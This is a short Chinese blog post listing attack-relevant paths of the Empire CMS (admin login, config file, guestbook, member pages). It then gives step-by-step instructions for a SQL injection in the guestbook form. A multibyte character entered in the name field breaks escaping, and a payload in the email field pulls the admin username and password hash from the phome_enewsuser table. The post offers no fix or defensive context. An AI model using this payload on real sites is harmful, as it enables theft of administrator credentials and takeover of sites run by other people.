Jitao's tweets

- Record something
首页 / 安全防范 / 正文

帝国cms系统利用路径

2019-04-26 安全防范 205 ℃ 0 评论

/e/DoInfo/ChangeClass.php?mid=1 投稿
/e/member/register/ChangeRegister.php 注册
/e/member/list/ 会员列表
/e/member/login/ 会员登陆
/e/admin/ 后台登陆
/e/config/config.php 后台安全设置
e/tool/gbook/?bid=1 留言
触发漏洞的步骤为:
Step1.在“姓名”处输入:縗
Step2.在“联系邮箱”处输入:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
Step3.“留言内容”随意填写,输入完毕后点击“提交”按钮。

0

猜你喜欢

额 本文暂时没人评论 来添加一个吧

发表评论